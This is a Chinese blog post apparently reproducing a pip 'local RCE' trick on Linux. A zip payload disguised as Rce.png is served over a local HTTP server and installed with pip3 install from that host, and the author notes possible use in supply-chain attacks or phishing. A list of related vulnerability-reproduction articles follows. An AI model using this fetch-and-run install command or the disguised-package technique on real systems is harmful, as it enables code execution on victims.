Linux系统下,pip/pip3的本地命令执行漏洞复现

最新推荐文章于 2023-11-03 21:45:43 发布
最新推荐文章于 2023-11-03 21:45:43 发布
阅读量1k 收藏
点赞数 1
分类专栏: web安全评估 文章标签: linux pip python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48421613/article/details/127507402
版权

其实说实话,这个洞是有争议的,不过竟然有效果,那咱们就复现一波。

首先脚本地址是在github的
地址: https://github.com/52piaoyu/linux-pip-rce

下载之后是主机文件其实是Rce.png,而后将格式更改成zip文件,可以看到其实文件的主体就是如下的
在这里插入图片描述

很简单很明了,干干净净~

好了,步入正题。

我们本地复现,本地利用python3环境开始临时的http环境

python -m http.server

在这里插入图片描述

而后靶机环境是kali哈

pip3 install "http://192"."168"."xx"."xxx:8000/Rce.png"

在这里插入图片描述

就这样,就可以了,点到即止​

怎么说呢,可以,但是没必要,因为这个洞只能本地利用,其次就是用于供应链、社工钓鱼还行,但是我想这个Poc…应该也许可能没人点吧。。。

vlan911
关注
专栏目录
漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
09-08 3102
Office中的WebExtension是一种用于扩展Microsoft Office功能的技术。Office插件使第三方开发者能够在Office应用程序中集成自己的服务和功能。这些插件采用跨平台的Web技术(如HTML,CSS和JavaScript)开发,可以在不同的平台和设备上运行。简单理解就是Office内置了一个浏览器,可以解析html/javascript/css代码,本次的漏洞,就是WPS在处理WebExtension时,未能正确的处理javascript代码,造成了溢出RCE。
web渗透测试漏洞复现:docker API未授权漏洞复现并getshell
最新发布
HACKONE的博客
03-28 420
总结一句话:该命令的作用是在IP为192.168.1.106的远程Docker守护进程上,基于镜像ID为2dc39ba059dc的镜像启动一个新的交互式容器,并挂载主机的根目录到容器内的/mnt目录,然后在新容器中打开一个Bash shell。由于Docker API提供了丰富的功能,它不仅为Docker CLI(命令行界面)提供底层支持,也被许多其他工具和平台广泛采用,如Kubernetes、Docker Compose等,实现了对Docker容器的自动化管理和大规模部署。
Linux pip3 rce复现
weixin_50618290的博客
10-26 1339
Linux pip rce
pip安装本地包
热门推荐
追求卓越,做到专业
05-17 4万+
pip直接安装包的方式会比较慢,特别对于一些重复安装,包又比较大的 pip install opencv-python 本地安装 pip install 包whl的物理路径 pip install /usr/packages/opencv_python-4.1.0.25-cp36-cp36m-manylinux1_x86_64.whl 指定下载源 也有一种方式是可以指定下载源...
python pip3安装
我只是个小学生 能力有限 一直抱着学习的态度
03-26 912
建立python3的软链 ln -s /usr/local/python3/bin/python3 /usr/bin/python3 创建一下pip3的软链接 ln -s /usr/local/python3/bin/pip3 /usr/bin/pip3 https://www.jianshu.com/p/1d1fe0d03496
python遇到错误跳过_【技术分享】修复Python任意命令执行漏洞
weixin_39939276的博客
11-25 292
1 前言今天遇到一个不好做白名单的Python命令执行漏洞修复的问题。由于是shell=True导致的任意命令执行,一开始大胆猜测将True改为False即可。经过测试确实是这样,但是参数需要放在list里,稍微有点麻烦。后来考虑,还可以做黑名单,过滤掉特殊字符,那就写fuzz脚本跑那些需要过滤的字符。最后觉得黑名单方式可能会被绕过,就看官方文档,发现了一个牛逼的修复方法,利用shlex.quo...
详述 PyPI 中的远程代码执行漏洞,可引发供应链攻击
smellycat000的专栏
08-02 410
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士日本安全研究员RyotaK 曾在上周发现Cloudflare 公司CDNJS 服务中的一个漏洞,可导致第三方在当前12%的网站上运...
《安全研究》利用pip自解压进行命令执行操作
1
11-03 307
pip自解压执行命令漏洞,是指pip工具在安装软件包时存在的一个潜在安全问题。pipPython的包管理器,用于从Python Package Index(PyPI)上下载和安装软件包。在Pip执行安装过程中使用了一个特殊的机制,即自解压执行命令(Self-Extracting Executable,简称SFX),它允许软件包直接作为可执行文件进行安装,该漏洞的存在使得攻击者可以通过构造恶意软件包来执行任意的系统命令
CVE-2021-32849 Gerapy远程命令执行漏洞复现
include_voidmain的博客
03-09 1245
CVE-2021-32849 Gerapy远程命令执行漏洞复现
Redis未授权漏洞复现及利用(window,linux
dreamthe的博客
03-22 2万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
Linux系统漏洞复现分析,CVE-2019-14287(Linux sudo 漏洞)分析
weixin_34494211的博客
04-29 394
作者:lu4nx@知道创宇404积极防御实验室作者博客:原文链接:近日 sudo 被爆光一个漏洞,非授权的特权用户可以绕过限制获得特权。官方的修复公告请见:。1. 漏洞复现实验环境:操作系统CentOS Linux release 7.5.1804内核3.10.0-862.14.4.el7.x86_64sudo 版本1.8.19p2首先添加一个系统帐号 test_sudo 作为实验所用:[root...
PyTorch安装包出问题,官方警告:这些Linux用户请立即卸载,否则会遭数据泄漏
veratata的博客
01-07 288
所有在2022年12月25日至12月30日期间,在Linux系统安装了(每日更新版)的用户,!上述消息来自PyTorch官方的一则最新声明。据官方透露,他们刚刚识别出一个与框架的“torchtriton”库同名的恶意依赖项,该依赖项在PyPI代码库上被破坏,并运行恶意二进制文件。
网络安全之命令执行漏洞复现
kali_Ma的博客
11-15 3171
Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。在版本1.997之前的Webmin中存在一个任意命令注入漏洞,触发该漏洞需登录Webmin。
linux扫描ip地址漏洞,Python的IP地址验证漏洞CVE-2021-29921详细介绍
weixin_29555609的博客
05-04 1528
当前,Python 标准库 ipaddress 被发现存在严重的 IP 地址验证漏洞,该漏洞已被标识为“CVE-2021-29921”,据研究人员说,这个漏洞Python 3.8.0 到 3.10 版本时才出现,涉及 Linux、Windows、MacOS 平台,请用户注意并防范,以下将详细介绍该漏洞。详细内容Python 标准库 ipaddress 被发现存在严重的 IP 地址验证漏洞,与 ...
Python常见安全漏洞及修复方法集合!你所不会的这里都有!
weixin_33895695的博客
11-17 480
概述编写安全的代码很困难,当你学习一门编程语言、一个模块或框架时,你会学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,Python也不例外,即使在标准库中,也存在着许多糟糕的实例。然而,许多 Python 开发人员却根本不知道这些。以下是我总结的10个Python常见安全漏洞,排名不分先后。1、输入注入注入攻击影响广泛且很常见,注入有很多种类,它们影响所有的语言、框架和环境。SQL ...
Samba远程代码执行漏洞复现-CVE-2017-7494
weixin_48128812的博客
12-02 3349
一、概述 Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。 二、漏洞影响版本 Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。 三、漏洞利用条件 1、服务器打开了文件/打印机共享端口445 2、共享文件拥有访问以及写入权限 3、攻击者知道
不得了了!Python 又爆出重大 Bug~
cainiao_python的博客
03-01 498
公众号“菜鸟学Python”,设为 “星标”和30w+一起学Python!来源:CSDN近日,Python 软件基金会(PSF)释出 Python 3.8.8 和 3.9.2 版本,...
owasp十大漏洞_2019年十大Python安全最佳实践
weixin_39880328的博客
11-27 373
在沉睡的戈佐岛上,安全问题并不重要。游客可以把他们的行李放在海滩上,去冒险,而不用担心他们的东西会被偷。然而,在我的家乡,我们说“如果你不把它绑起来,它就不是你的了。”所有东西都可以被偷。同样,互联网是世界上最大和最繁忙的城市!如果它可以被读取、复制、写入或注入SQL,那么它就不是你的了。入门Python其实很容易,但是我们要去坚持学习,每一天坚持很困难,我相信很多人学了一个星期就放弃了,为什么呢...
【技术分享】关于Python漏洞挖掘那些不得不提的事儿
SAKAISON的博客
09-14 5184
还是我Python大法好,能爬数据能做好看的图能撩汉,无所不能 前言 Python因其在开发更大、更复杂应用程序方面独特的便捷性,使得它在计算机环境中变得越来越不可或缺。虽然其明显的语言清晰度和使用友好度使得软件工程师和系统管理员放下了戒备,但是他们的编码错误还是有可能会带来严重的安全隐患。 这篇文章的主要受众是还不太熟悉Python的人,其中会提及少量与
linux pip3本地安装
weixin_30672019的博客
08-11 762
如果你的linux系统中没有pip3,那么可以这样安装 到官网下载 pip3 工具,当然最新版的并不叫pip3,在官网上可以找到这样的包,pip-18 https://pypi.org/search/?q=pip3 下载url: https://files.pythonhosted.org/packages/69/81/52b68d0a4de760a2f1979b0931ba7889202f...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值